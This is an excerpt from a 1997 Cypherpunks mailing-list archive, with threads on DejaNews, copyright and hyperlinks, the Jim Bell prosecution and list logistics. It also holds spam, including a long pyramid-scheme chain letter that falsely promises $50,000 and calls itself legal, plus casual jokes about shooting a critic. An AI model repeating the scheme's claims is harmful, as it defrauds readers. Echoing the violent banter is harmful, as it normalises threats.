In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 19 Aug 1997, Tim May wrote:

[...]

> As a matter of fact, I expect there have already been actions demanding
> that DejaNews purge their data bases of some posting or another. After all,
> they are truly a form of "eternity server."

It is possable to remove your own posts from the dejanews. However there
policy says basicly We just index Usenet we are not responcible for what
peaple stick on it.

Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM/nNEKQK0ynCmdStAQHeoQQAxiBPIhHO6siWGO65lVtiw22JsPkxTgAJ
g7T6beGcwy554dmCXnjROVs2g/77i49UCJZfEMOX744KENDCYfwYyS0qmb8vh4Tp
V/jmH0Hf/V2JEvvuxryb5db8GDWKbPPLK0ACz8LCm0kgPnDt5FAaxKWz+adBmVOB
co7Mslv1ffE=
=BijM
-----END PGP SIGNATURE-----






From tcmay at got.net  Tue Aug 19 14:13:59 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 05:13:59 +0800
Subject: Chiropractic
In-Reply-To: 
Message-ID: 



At 9:51 AM -0700 8/19/97, William H. Geiger III wrote:

>
>Well the field of Psychology is second only Chiropracticy for quacks.
>
>They are filled with wantabe scientist who could not hack it in a real
>scientific field.

Actually, you are being too kind here to Chiropractic.

Yes, "Chiropractic." Not "Chiropracticy" or anything like that. They call
their field "chiropractic."

Sort of like electronics folks saying "I specialize in Electronic." Or
psychiatrists saying "I'm into Psychiatric."

Chiropractic _what_?

But beware the siren song of weeding out quacks. My local community floated
a proposal to license and regulate psychics, palm readers, fortune tellers,
etc., until wiser heads prevailed, pointing out the essential idiocy of
this. Not to mention the First Amendment issues, even if money is changing
hands (which of course happens in nearly all churches, so money exchange is
not a license to interfere in religious practices).

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From enoch at zipcon.net  Tue Aug 19 14:28:20 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Wed, 20 Aug 1997 05:28:20 +0800
Subject: CPAC Quotes Templeton
Message-ID: <19970819211323.369.qmail@zipcon.net>



Brad Templeton's thoughts on hyperlinks as copyright infringement
may be browsed at...

          http://www.clari.net/brad/linkright.html

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From alan at ctrl-alt-del.com  Tue Aug 19 14:29:38 1997
From: alan at ctrl-alt-del.com (Alan)
Date: Wed, 20 Aug 1997 05:29:38 +0800
Subject: David Downey asks to be shot
In-Reply-To: <199708192043.PAA05812@mailhub.amaranth.com>
Message-ID: 



On Tue, 19 Aug 1997, William H. Geiger III wrote:

> In , on 08/19/97 
>    at 12:28 PM, Tim May  said:
> 
> >I agree. We should shoot a few of the enemies first.
> 
> >I suggest you be shot.
> 
> 
> I'll second the motion shall we put it to a vote?? :)

I wonder how close Lucky and the rest of the Cypherpunks firing squad to
Mr. Downey? ]:>

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From 00896450 at hyperway.com  Wed Aug 20 05:30:53 1997
From: 00896450 at hyperway.com (00896450 at hyperway.com)
Date: Wed, 20 Aug 1997 05:30:53 -0700 (PDT)
Subject: ADULT VIDEOS
Message-ID: <>


Explicit straight, gay and lesbian videos.

http://www.espdirect.com/adult/

Absolutely discrete shipping within 24 hours.

Visit our Web Site now...
Adults only... You must be 18 years or over to visit.

Click Here

*********************************************************************

To be removed from our mailing lists, please send any message
to: simrem at answerme.com
Thank you

*********************************************************************






From 00896450 at hyperway.com  Wed Aug 20 05:30:53 1997
From: 00896450 at hyperway.com (00896450 at hyperway.com)
Date: Wed, 20 Aug 1997 05:30:53 -0700 (PDT)
Subject: ADULT VIDEOS
Message-ID: <>


Explicit straight, gay and lesbian videos.

http://www.espdirect.com/adult/

Absolutely discrete shipping within 24 hours.

Visit our Web Site now...
Adults only... You must be 18 years or over to visit.

Click Here

*********************************************************************

To be removed from our mailing lists, please send any message
to: simrem at answerme.com
Thank you

*********************************************************************






From frissell at panix.com  Tue Aug 19 15:09:05 1997
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 20 Aug 1997 06:09:05 +0800
Subject: The Real Bell Issue / Re: Bell, etc
In-Reply-To: <3.0.2.32.19970819111508.03721e8c@panix.com>
Message-ID: <3.0.2.32.19970819175653.03657300@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 11:21 AM 8/19/97 -0700, Tim May wrote:

>So, I disagree with Duncan's apparent point that it's too bad the Bell case
>didn't go to trial. I'm convinced Bell would have been convicted on most or
>all charges. Hardly a test case for anything important.

But the charges were minor stuff.  Under the Federal sentencing guidelines he 
wouldn't have gotten much if convicted.  And I think that he had a good 
defense to some of the charges.  Selective prosecution and no crime for 
example.  The collecting of the names and addresses of government employees 
is not clearly illegal.  In some cases, it is public information and he could 
argue that he intended to organize demonstrations against them.  It is also 
not clear how they found out about the stink bomb.  That could possibly have 
been challanged.  

The charges were fuzzy and minor.  Those sorts of things make them easy for a 
strong advocate to ridicule in court.  Clearly a waste of the taxpayer's 
money.  Their nature smells of political prosecution.  Another line of 
defense.    

He could have been aggressive and fought instead of wimping out.  Lots of 
people have faced much more serious crimes and won.  It's not like Jim had 
anything better to do.

In such cases, an aggressive show of strength of character is best.  Weakness 
invites oppression.  A rule that you - Tim - seem to follow in general too.

DCF    

"Shit Happens" -- Slogan on the Cat Hat worn by the lead defendant in the 
Princeton Partners Insider Trading case during negotiations with the Feds.  
Court of appeals threw out his conviction.
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM/oWoIVO4r4sgSPhAQHnXAP9HqPlg597qAyz2KBtC1QwQfqSFeNYBgPd
Wu8MixBwBY4g72gLwfxW72vyaHjfKAK1q1Y9Ya8fYqOiqNYdZCb0ePdAhgpnKANc
wLphhfc/kpx9hVSm3r7looVHqtW343GwMYHMxaSGCc9SnChnU13hsmOVeGQyA4Gj
fb5jMAESNr0=
=SCZ8
-----END PGP SIGNATURE-----






From gunterw at earthlink.net  Wed Aug 20 06:10:09 1997
From: gunterw at earthlink.net (MEGA Communications)
Date: Wed, 20 Aug 1997 06:10:09 -0700 (PDT)
Subject: Hello
Message-ID: <3.0.32.19970819230317.0068d10c@earthlink.net>


Hello!

Personal Note From Sender:  You've probably received this opportunity
by email several times by different people in the past twelve months. Do you know why? 
Because people everywhere are finding that it REALLY WORKS! Try it! I'm not kidding! 


              **** FREE $400 Bulk e-mail Software ****
              **** FREE $200 Check by fax, email, phone Software ****
              **** FREE Business ****

Receive Your Bulk e-mail and Checking Software the same day you receive
Report #1   I will not ask you for any MONEY for the Software.
Your Business is about to EXPLODE
You Don't want toTrash This one !!!!!
Read This Twice !!!!!

<>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>
You are about to make at least $50,000 - In less than 90 days
Read the enclosed program...THEN READ IT AGAIN!...
<>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>
Please accept my apology if this was sent to you in error!

Dear friend,

The following income opportunity is one you may be interested in taking a
look at.  It can be started with VERY MINIMAL outlay and the income return
is TREMENDOUS!

The enclosed information is something I almost let slip through my
fingers.  Fortunately, sometime later I re-read everything and gave
some thought and study to it.

My name is Christopher Erickson.  Two years ago, the corporation I
worked at for the past twelve years down-sized and my position was
eliminated.  After unproductive job interviews,  I decided to open my
own business.  Over the past year, I incurred many unforeseen financial
problems.  I owed my family, friends, and creditors over $35,000.  The
economy was taking a toll on my business and I just couldn't seem to
make ends meet.  I had to refinance and borrow against my home to
support my family and struggling business.  I truly believe it was
wrong for me to be in debt like this.  AT THAT MOMENT something
significant happened in my life and I am writing to share my experience
in hopes that this will change your life FOREVER....FINANCIALLY!!!

In mid-December, I received this program via email.  Six months prior
to receiving this program I had been sending away for information on
various business opportunities.  All of the programs I received, in my
opinion, were not cost effective.  They were either too difficult for
me to comprehend or the initial investment was too much for me to risk
to see if they worked or not.  One claimed I'd make a million dollars
in one year...it didn't tell me I'd have to write a book to make it.

But like I was saying, in December of '95 I received this program.  I
didn't send for it, or ask for it, they just got my name off a mailing
list.  THANK GOODNESS FOR THAT!!!  After reading it several times, to
make sure I was reading it correctly, I couldn't believe my eyes.  Here
was a MONEY-MAKING PHENOMENON.  I could invest as much as I wanted to
start, without putting me further in debt.  After I got a pencil and
paper and figured it out, I would at least get my money back.  After
determining that the program is LEGAL and NOT A CHAIN LETTER, I decided
"WHY NOT".

Initially I sent out 10,000 emails.  It only cost me about $15.00 for
my time on-line.  The great thing about email is that I didn't need any
money for printing to send out the program, only the cost to fulfill my
orders.  I am telling you like it is, I hope it doesn't turn you off,
but I promised myself that I would not "rip-off" anyone, no matter how
much money it cost me! 

In less than one week, I was starting to receive orders for REPORT #1.
By January 13th, I had received 26 orders for REPORT #1.  When you read
the GUARANTEE in the program, you will see that "YOU MUST RECEIVE 15
TO 20 ORDERS FOR REPORT #1 WITHIN TWO WEEKS.  IF YOU DON'T,
SEND OUT MORE PROGRAMS UNTIL YOU DO!"  My first step in making
$50,000 in 20 to 90 days was done.  By January 30th, I had received
196 orders for REPORT #2.  If you go back to the GUARANTEE, "YOU
MUST RECEIVE 100 OR MORE ORDERS FOR REPORT #2 WITHIN
TWO WEEKS.  IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO.
ONCE YOU HAVE 100 ORDERS, THE REST IS EASY, RELAX, YOU
WILL MAKE YOUR $50,000 GOAL."  Well, I had 196 orders for REPORT #2,
96 more than I needed.  So I sat back and relaxed.  By March 19th, of
my emailing of 10,000, I received $58,000 with more coming in every
day.

I paid off  ALL my debts and bought a much needed new car.  Please take
time to read the attached program, IT WILL CHANGE YOUR LIFE FOREVER!
Remember,  it wont work  if you don't try it.  This program does work,
but you must follow it EXACTLY!  Especially the rules of not trying to
place your name in a different place.  It doesn't work, you'll lose out
on a  lot  of  money!  REPORT  #2  explains this.  Always follow the
guarantee, 15 to 20  orders  for REPORT #1, and 100 or more orders for
REPORT #2 and you will make  $50,000 or more in 20 to 90 days.  I AM
LIVING PROOF THAT IT WORKS !!!

If you are a fellow business owner and you are in financial trouble
like I was, or you want to start your own business, consider this a
sign.  I DID!

                                        Sincerely,
                                        Christopher Erickson

PS  Do you have any idea what 11,700 $5 bills ($58,000) look like piled
up on a kitchen table? IT'S AWESOME!

"RETIRED CHIEF OF POLICE"

"As a retired Chief Of Police, I would not get involved in anything 
that was not completely legitimate.   I have made thousands, thanks to
this wonderful program."

                                          Ken Kennedy, CA

"THREW IT AWAY"

"I  had  received  this program before.  I  threw  it away, but later
wondered if I shouldn't have given it a try.  Of course, I had no idea
who to contact to get a copy, so I had to wait until I was emailed
another copy of the program.  Eleven months passed, then it came.  I
DIDN'T throw this one away.  I made $41,000 on the first try."

                                        Dawn W., Evansville, IN

"NO FREE LUNCH"

"My late father always told me, 'remember, Alan, there is no free lunch
in life.  You get out of life what you put into it.'  Through trial and
error and a somewhat slow frustrating start, I finally figured it out.
The program works very well, I just had to find the right target group
of people to email it to.  So far this year, I have made over $63,000
using this program.  I know my dad would have been very proud of me."

                                        Alan B., Philadelphia, PA

A PERSONAL NOTE FROM THE ORIGINATOR OF THIS PROGRAM

By the time you have read the enclosed information and looked over the
enclosed program and reports, you should have concluded that such a
program,  and  one that is legal,  could not have been created by an
amateur.

Let me tell you a little about myself.  I had a profitable business for
ten years.  Then in 1979 my business began falling off.  I was doing
the same things that were previously successful for me, but it wasn't
working.  Finally, I figured it out.  It wasn't me, it was the economy.
Inflation and recession had replaced the stable economy that had been
with us since 1945.  I don't have to tell you what happened to the
unemployment rate...because many of you know from first hand experience.
There were more failures and bankruptcies than ever before.

The middle class was vanishing.  Those who knew what they were doing
invested wisely and moved up.  Those who did not, including those who
never had anything to save or invest, were moving down into the ranks
of the poor.  As the saying goes, "THE RICH GET RICHER AND THE POOR GET
POORER."  The traditional methods of making money will never allow you
to "move up" or "get rich", inflation will see to that.

You have just received information that can give you financial freedom
for the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF
EFFORT."  You can make more money in the next few months than you have
ever imagined.

Follow the program EXACTLY AS INSTRUCTED.  Do not change it in any way.
It works exceedingly well as it is now.  Remember to email a copy of
this exciting program to everyone that you can think of.  One of the
people you send this to may send out 50,000...and your name will be on
every one of them!.  Remember though, the more you send out, the more
potential customers you will reach.

So my friend, I have given you the ideas, information, materials and
opportunity to become financially independent, IT IS UP TO YOU NOW!


HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$$

Let's say that you decide to start small, just to see how it goes, and
we'll assume you and all those involved send out 2,000 programs each.
Let's also assume that the mailing receives a .5% response.  Using a
good list the response could be much better.  Also many people will
send out hundreds of thousands of programs instead of 2,000.  But
continuing with this example, you send out only 2,000 programs.  With a
5% response, that is only 10 orders for REPORT #1.  Those 10 people
respond by sending out 2,000 programs each for a total of 20,000.  Out
of those .5%, 100 people respond and order REPORT #2.  Those 100 mail
out 2,000 programs each for a total of 200,000.  The .5% response to
that is 1,000 orders for REPORT #3.  Those 1,000 send out 2,000
programs each for a 2,000,000 total.  The .5% response to that is
10,000 orders for REPORT #4.  That's 10,000 five dollar bills for you.
CASH!!!!  Your total income in this example is $50 + $500 + $5000 +
$50,000 for a total of $55,550!!!!

REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF 2,000 PEOPLE YOU
MAIL TO WILL DO ABSOLUTELY NOTHING... AND TRASH THIS PROGRAM!
DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE
OR HALF SENT OUT 100,000 PROGRAMS INSTEAD OF ONLY 2,000.  Believe
me, many people will do that and more!  By the way, your cost to participate
in this is practically nothing.  You obviously already have an internet
connection and email is FREE!!!  REPORT#3 will show you the best
methods for bulk emailing and purchasing email lists.

THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY.  It does not
require you to come in contact with people, do any hard work, and best
of all, you never have to leave the house except to get the mail.  If
you believe that someday you'll get that big break that you've been
waiting for, THIS IS IT!  Simply follow the instructions, and your
dream will come true.  This multi-level email order marketing program
works perfectly...100% EVERY TIME.  Email is the sales tool of the
future.  Take advantage of this non-commercialized method of
advertising NOW!!  The longer you wait, the more people will be doing
business using email.  Get your piece of this action!!

MULTI-LEVEL MARKETING (MLM) has finally gained respectability.  It is
being taught in the Harvard Business School, and both Stanford Research
and The Wall Street Journal have stated that between 50% and 65% of all
goods and services will be sold throughout Multi-level Methods by the
mid to late 1990's.  This is a Multi-Billion Dollar industry and of the
500,000 millionaires in the US, 20% (100,000) made their fortune in the
last several years in MLM.  Moreover, statistics show 45 people become
millionaires everyday through Multi-Level Marketing.

INSTRUCTIONS:

We at FIKA International Limited, have a method of raising capital that 
REALLY WORKS 100% EVERY TIME.  I am sure that you could
use $50,000 to $125,000 in the next 20 to 90 days.  Before you say
"Bull", please read the program carefully.


This is the GREATEST Multi-level Mail Order Marketing anywhere:

Step (1)   Order all four 4 REPORTS listed by NAME AND NUMBER.  Do this
           by ordering the REPORT from each of the four 4 names listed
           on the next page.  For each REPORT, send $5 CASH and a SELF-
           ADDRESSED, STAMPED envelope  (BUSINESS SIZE #10) to the
           person listed for the SPECIFIC REPORT.  International orders
           should also include $1 extra for postage.  It is essential
           that you specify the NAME and NUMBER of the report requested
           to the person you are ordering from.  You will need ALL FOUR
           4 REPORTS because you will be REPRINTING and RESELLING them.
           DO NOT alter the names or sequence other than what the
           instructions say.  IMPORTANT:  Always provide same-day
           service on all orders.

Step (2)   Replace  the  name  and  address  under  REPORT #1  with
           yours,  moving the one that was there down to REPORT #2.
           Drop  the  name and address under REPORT #2 to REPORT #3,
           moving the one that was there to REPORT #4.  The name and
           address that was under REPORT #4 is dropped from the list
           and this party  is  no doubt on the way to the bank.  When
           doing   this,   make   certain   you  type  the  names  and
           addresses ACCURATELY!  DO NOT MIX UP MOVING PRODUCT/REPORT
           POSITIONS!!!

Step (3)   Having made the required changes in the NAME list, save it
           as a text (.txt) file in it's own directory to be used with
           whatever email program you like.  Again, REPORT #3 will tell
           you the best methods of bulk emailing and acquiring email
           lists.

Step (4)   Email a copy of the entire program (all of this is very
           important) to everyone whose address you can get your hands
           on. Start with friends and relatives since you can encourage
           them to take  advantage of this  fabulous  money-making
           opportunity.  That's what I did.  And they love me now, more
           than ever.  Then, email to anyone and everyone!  Use your
           imagination!  You can get email addresses from companies on
           the internet who specialize in email mailing lists.  These
           are very cheap, 100,000 addresses for around $35.00.

IMPORTANT:  You won't get a good response if you use an old list, so
always request a FRESH, NEW list. You will find out where to purchase
these lists when you order the four 4 REPORTS.

REQUIRED REPORTS

***Order each REPORT by NUMBER and NAME***

ALWAYS SEND A SELF-ADDRESSED, STAMPED ENVELOPE
AND $5 CASH FOR EACH ORDER REQUESTING THE
SPECIFIC REPORT BY NAME AND NUMBER
Please, no checks, cash only !
________________________________________________________
REPORT #1

"HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES"
******FREE $400 bulk email program******
******FREE check by fax, email & phone program******
******FREE BUSINESS******
ORDER REPORT #1 FROM:

MEGA Communications
10078 A Arrow Route Suite 173
Rancho Cucamonga,  CA 91730
________________________________________________________
REPORT #2
"MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:

FIKA International Limited
P.O. Box 39095
Washinton,  D.C. 20016-9098
________________________________________________________
REPORT#3
"SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:

Global Innovations
P.O. Box 3191
Salem, Oregon 97302
________________________________________________________
REPORT #4
"EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:

One Big Family
560 E. Rowland St. Suite J-1
Covina, CA 91723
______________________________________________________

CONCLUSION

.I am enjoying my fortune that I made by sending out this program.
You too, will be making money in 20 to 90 days, if you follow the
SIMPLE STEPS outlined in this mailing.

Very few people reach financial independence, because when
opportunity knocks, they choose to ignore it.  It is much easier to say
"NO" than "YES", and this is the question that you must answer.  Will
YOU ignore this amazing opportunity or will you take advantage of it?
If you do nothing, you have indeed missed something and nothing will
change.  Please re-read this material, this is a special opportunity.
If you have any questions, please feel free to write to the sender of
this information.  You will get a prompt and informative reply.

My method is simple.  I sell thousands of people a product for $5 that
costs me pennies to produce and email.  I should also point out that
this program is legal and everyone who participates WILL make money.
This is not a chain letter or pyramid scam.  At times you have probably
received chain letters, asking you to send money, on faith, but getting
NOTHING in return, NO product what-so-ever!  Not only are chain letters
illegal, but the risk of someone breaking the chain makes them quite
unattractive.

You are offering a legitimate product to your people.  After they
purchase the product from you, they reproduce more and resell them.
It's simple free enterprise.  As you learned from the enclosed material,
the PRODUCT is a series of four 4 FINANCIAL AND BUSINESS REPORTS.  The
information contained in these REPORTS will not only help you in making
your participation in this program more rewarding, but will be useful
to you in any other business decisions you make in the years ahead.
You are also buying the rights to reprint all of the REPORTS, which
will be ordered from you by those to whom you mail this program.  The
concise one and two page REPORTS you will be buying can easily be
reproduced at a local copy center for a cost off about 3 cents a copy.
Best wishes with the program and Good Luck!


TIPS FOR SUCCESS

Send for your four 4 REPORTS immediately so you will have them when the
orders start coming in.  When you receive a $5 order, you MUST send out
the product/service to comply with US Postal and Lottery laws.  Title
18 Sections 1302 and 1341 specifically state that:  "A PRODUCT OR
SERVICE MUST BE EXCHANGED FOR MONEY RECEIVED."

WHILE YOU WAIT FOR THE REPORTS TO ARRIVE:

1.      Name your new company. You can use your own name if you desire.

2.      Get a post office box (preferred).

3.      Edit the names and addresses on the program. You must remember,
         your name and address go next to REPORT #1 and the others all
         move down one, with the fourth one being bumped OFF the list.

4.      Obtain as many email addresses as possible to send until you
         receive the information on mailing list companies in REPORT #3.

5.      Decide on the number of programs you intend to send out.  The
         more you send, and the quicker you send them, the more money
         you will make.

6.      After mailing the programs, get ready to fill the orders.

7.      Copy the four 4 REPORTS so you are able to send them out as
         soon as you receive an order. IMPORTANT: ALWAYS PROVIDE
         SAME-DAY SERVICE ON ORDERS YOU RECEIVE!


YOUR GUARANTEE

The check point which GUARANTEES your success is simply this:  you must
receive 15 to 20 orders for REPORT #1.  This is a must!!!  If you don't
within two weeks, email out more programs until you do.  Then a couple
of weeks later you should receive at least 100 orders for REPORT #2, if
you don't, send out more programs until you do.  Once you have received
100 or more orders for REPORT #2, (take a deep breath) you can sit back
and  relax,  because  YOU  ARE  GOING TO  MAKE  AT  LEAST  $50,000.
Mathematically  it  is  a  proven  guarantee.   Of  those  who  have
participated in the program and reached the above GUARANTEES-ALL have
reached their $50,000 goal.  Also, remember, every time your name is
moved down the list you are in front of a different REPORT, so you can
keep track of your program by knowing what people are ordering from you.
IT'S THAT EASY, REALLY, IT IS!!!



"I seem to have been only like a boy playing on the seashore, and diverting
myself in now and then finding a smoother pebble or a prettier shell than
ordinary, whilst the great ocean of truth lay all undiscovered before me."  
                                                                        - Sir
Isaac Newton

















From tcmay at got.net  Tue Aug 19 15:32:50 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 06:32:50 +0800
Subject: CPAC Quotes Templeton
In-Reply-To: <19970819202714.28609.qmail@zipcon.net>
Message-ID: 




I wish I'd heard about this issue a few days ago, as I was just at a party
at Brad's house on Saturday.

At 1:27 PM -0700 8/19/97, Mike Duvos wrote:

>They quote as their cite for this concept a piece by Brad Templeton,
>ClariNet owner, who apparently shares their view that links can constitute
>copyright infringement under certain circumstances.  Fortunately, Brad
>does not restrict linking to the article in question, from which I offer
>the following tiny snippet under the "Fair Use" doctrine.
>
> > I, and many other people initially had the intuitive feeling that it
> > could never be a violation of copyright to make a link to a web page.
> > Of late, I've come to think that this might be wrong.
>
>Now what CPAC objects to is people who post messages saying, essentially,
>
>"Look at the silly CPAC people rant and froth.  "
>
>I would suggest that CPAC is a political organization, with a very
>well-defined social agenda, which I have every right to comment on,
>and that illustrative hyperlinks in my commentary constitute "Fair Use"
>of their content.
>
>Am I on firm legal ground here?

I think so. Even quoting _blocks_ of someone's text is usually considered
"fair use," and there have never, to my knowledge, been any cases in which
a reference or pointer to a text was considered copyright infringement.
References, as in bibliographies, are in fact just that, references or
pointers. Saying "Go read Joseph Finder's "The Zero Hour"" is not an
infringement of any sort.

As for Web pages, it seems clear that the same logic applies. Someone who
makes their material available to anyone who follows a link cannot object
when someone else publishes that link, no matter in what context.

So, I think Brad Templeton is clearly wrong. Though, in fairness to Brad,
his views may be more nuanced than the brief excerpt above.

This topic came up a couple of times on the Cyberia-l mailing list, with
the consensus, as I recall, being that "of course" pointers and citations
are not copyrightable. They fail all the tests of length, the reasons for
copyright, etc.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From rah at shipwright.com  Tue Aug 19 15:37:57 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 20 Aug 1997 06:37:57 +0800
Subject: Crypto-anarchy and Haydn
Message-ID: 




--- begin forwarded text


Date: Tue, 19 Aug 1997 17:06:07 -0400 (EDT)
From: Peter F Cassidy 
To: dcsb at ai.mit.edu
Subject: Crypto-anarchy and Haydn
Mime-Version: 1.0
Sender: bounce-dcsb at ai.mit.edu
Precedence: bulk
Reply-To: Peter F Cassidy 


DCSBers,

I'd like to invite you to the Longwood Symphony Orchestra's summer concert
at the Hatch Shell in Boston on Wed. Aug. 20, 1997 at 7:30. It's free. The
LSO is presenting Mendelsohn's Capricio Briliante Opus 22, the Haydn Cello
concerto and the Haydn Symphony 104, the last movement of which contains a
coded message. Played backwards at twice the normal turntable speed, you
can clearly hear the composer shout, "Burn the mint" in the finale, about
64 bars from the end.





For help on using this list (especially unsubscribing), send a message to
"dcsb-request at ai.mit.edu" with one line of text: "help".

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From tcmay at got.net  Tue Aug 19 16:12:06 1997
From: tcmay at got.net (Tim May)
Date: Wed, 20 Aug 1997 07:12:06 +0800
Subject: The Real Bell Issue / Re: Bell, etc
In-Reply-To: 
Message-ID: 



At 2:56 PM -0700 8/19/97, Duncan Frissell wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 11:21 AM 8/19/97 -0700, Tim May wrote:
>
>>So, I disagree with Duncan's apparent point that it's too bad the Bell case
>>didn't go to trial. I'm convinced Bell would have been convicted on most or
>>all charges. Hardly a test case for anything important.
>
>But the charges were minor stuff.  Under the Federal sentencing guidelines he
>wouldn't have gotten much if convicted.  And I think that he had a good
>defense to some of the charges.  Selective prosecution and no crime for
>example.  The collecting of the names and addresses of government employees
>is not clearly illegal.  In some cases, it is public information and he could
>argue that he intended to organize demonstrations against them.  It is also

I dont' believe the "collecting the names..." point made it into the final
charges, but I could be wrong. My recollection is that the three main
charges were: using multiple phony SS numbers to evade taxes, failure to
file and pay taxes in the required manner, and the stink bomb charges.  Nor
did any of the things about poisoning water supplies or dropping carbon
fibers down airshafts make it into the final charges, that I recall.

>From my reading, by limiting the scope to the points above the Feds had a
pretty strong case. As to whether Bell could claim he was being prosecuted
because of his views, I'll get to that below.

>not clear how they found out about the stink bomb.  That could possibly have
>been challanged.

There is the testimony of one of his former friends that Bell claimed he
had stinkbombed a lawyer he didn't like a few years back, apparently using
the same mercaptin used (it appears) in the recent case. And didn't Alan
Olsen say on this list that Jim had talked about such stinkbombs? It seems
reasonable that a jury would believe Bell had ordered mercaptin, had told
others he had used it in the past, and that an attack on a Portland IRS
office followed his altercation over taxes with them by a few weeks. Were I
on the jury, I think I'd think he did it.

But, hey, maybe "jury nullification" could get him off.

>The charges were fuzzy and minor.  Those sorts of things make them easy for a
>strong advocate to ridicule in court.  Clearly a waste of the taxpayer's
>money.  Their nature smells of political prosecution.  Another line of
>defense.

No doubt a Gerry Spence could do this, but his court-appointed lawyer was
most likely oblivious to such tactics, and was anxious to plead him out. As
we all saw in the McVeigh case, court appointed lawyers really are not
working for their putative clients.

My bigger fear, and no doubt Jim will someday read this and perhaps take
umbrage at my comments here, is that this several-month "debriefing" period
is where the Feds are collecting as much incriminating information against
some of us as they can, perhaps with an eye toward hitting various of us
with RICO charges, sedition, etc.

(Now _this_ would be a high-risk tactic for the Feds to take, as we who are
charged might fight back hard, and actually win. Depends on the climate. If
they link us to supplying strong crypto to various freedom fighters, and to
money launderers (remember Anguilla), etc., then maybe a jury would
convict. Not on sedition, perhaps, as this is hard to prove, but on RICO
charges.)



>He could have been aggressive and fought instead of wimping out.  Lots of
>people have faced much more serious crimes and won.  It's not like Jim had
>anything better to do.
>
>In such cases, an aggressive show of strength of character is best.  Weakness
>invites oppression.  A rule that you - Tim - seem to follow in general too.

Well, Bell was about as extreme and aggressive as one can get...and yet....

If I were to be arrested and held without bail--perhaps because of the
"arms cache" and "chemicals" the news media would breathlessly report--I
rather suspect my aggressiveness would fall on deaf ears.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ant at notatla.demon.co.uk  Tue Aug 19 16:30:12 1997
From: ant at notatla.demon.co.uk (Antonomasia)
Date: Wed, 20 Aug 1997 07:30:12 +0800
Subject: Status of Cypherpunks list sites?
Message-ID: <199708192203.XAA03398@notatla.demon.co.uk>



TCMay wrote:

> Not too long ago I was subscribed to the "cypherpunks at algebra.com" address,
> and the list stopped flowing to me for a day or so. I resubbed under
> "cypherpunks at cyberpass.net." I noticed that Igor Chudov said he was taking
> a hiatus from the Net and lists, so I wondered if this meant his support
> for his site was either being dropped or might be subject to more frequent
> outages.

I re-subscribed to the algebra list when I returned from HIP97
and in fact got onto the ssz list.  Seems like Igor diverted the
subscription.  Comments, Igor ?

> And shouldn't we all be making a more serious effort to drop the use of the
> "cypherpunks at toad.com" address, as John said some months back that he would
> support forwarding stuff for a while, but not necessarily forever. As it
> is, it just adds another hop and another potential weak link.

Yes.


--
##############################################################
# Antonomasia   ant at notatla.demon.co.uk                      #
# See http://www.notatla.demon.co.uk/                        #
#### !!! PGP 5.0 beta available now at ftp.replay.com !!! ####






From aba at dcs.ex.ac.uk  Tue Aug 19 16:36:01 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Wed, 20 Aug 1997 07:36:01 +0800
Subject: creative references (was Re: CPAC Quotes Templeton)
In-Reply-To: 
